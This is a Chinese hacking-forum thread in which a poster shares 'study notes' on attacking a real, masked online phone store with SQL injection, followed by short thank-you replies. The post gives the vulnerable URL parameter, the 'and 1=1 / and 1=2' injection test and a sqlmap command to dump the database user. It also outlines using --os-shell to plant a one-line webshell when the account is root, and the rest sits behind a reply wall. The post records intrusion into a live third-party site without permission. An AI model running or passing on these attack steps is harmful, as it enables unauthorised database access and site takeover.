查看: 59123|回复: 78

学习笔记-Sqlmap注入丫丫手机商城

  [复制链接]
发表于 2014-11-13 14:48:41 | 显示全部楼层 |阅读模式
学习笔记-Sqlmap注入丫丫手机商城
第二天学习sqlmap了,昨晚上对KALI的奋斗实在是蛋疼,不过让我对简单的注入语句更加熟练了,下面是个学习例子。
目标:www.XXXX.com
打码了,各位不要轮训了 太可怕了天朝~~,没技术含量 更没最终的shell,后台屏蔽~
word文档格式,懒得排版了
0x1
注入点:http://www.XXX.com/news/specials.php?nid=10028
And 1=1 返回正常 and 1=2 返回错误
扔进sqlmap,神器里面开始注射精子~~[我有点淫荡了,可能是因为光棍节问题]
查看数据库用户 DBMS是数据库mysql5.0
Sqlmap.py –u “http://www.XXX.com/news/specials.php?nid=10028” –current-user
如果是root的话,可以考虑爆路径,然后—os-shell写一句话进去 这里不是,略过…



游客,如果您要查看本帖隐藏内容请回复

评分

参与人数 1i币 +40 收起 理由
C4r1st + 40 支持原创

查看全部评分

回复

使用道具 举报

发表于 2014-11-13 15:35:58 | 显示全部楼层
看看,支持原创
回复 支持 反对

使用道具 举报

发表于 2014-11-13 15:54:47 | 显示全部楼层
支持原创,看看
回复 支持 反对

使用道具 举报

头像被屏蔽
发表于 2014-11-13 16:32:52 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

发表于 2014-11-13 17:29:16 | 显示全部楼层
支持一下。
回复 支持 反对

使用道具 举报

发表于 2014-11-13 19:31:44 | 显示全部楼层
谢谢分享
回复 支持 反对

使用道具 举报

发表于 2014-11-13 22:50:27 | 显示全部楼层
感谢分享.拿走学习了
回复 支持 反对

使用道具 举报

发表于 2014-11-14 01:58:50 | 显示全部楼层
学习下。。。。
回复 支持 反对

使用道具 举报

发表于 2014-11-14 09:28:27 | 显示全部楼层
正好学习一下sqlmap
回复 支持 反对

使用道具 举报

发表于 2014-11-14 12:35:49 | 显示全部楼层
谢谢分享啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-9 13:17 , Processed in 0.052990 second(s), 18 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部